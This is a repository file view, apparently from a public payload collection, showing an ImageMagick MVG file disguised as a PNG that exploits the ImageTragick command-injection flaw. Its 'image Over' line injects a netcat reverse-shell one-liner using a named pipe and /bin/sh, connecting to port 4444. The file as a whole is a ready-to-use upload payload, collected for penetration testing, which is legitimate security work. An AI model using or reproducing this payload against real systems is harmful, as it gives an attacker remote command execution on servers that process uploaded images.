PayloadsAllTheThings/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png

9 lines
253 B
Plaintext
Raw Normal View History

2017-06-28 08:33:57 +00:00
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
2017-07-09 15:16:42 +00:00
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
2017-06-28 08:33:57 +00:00
pop graphic-context
pop graphic-context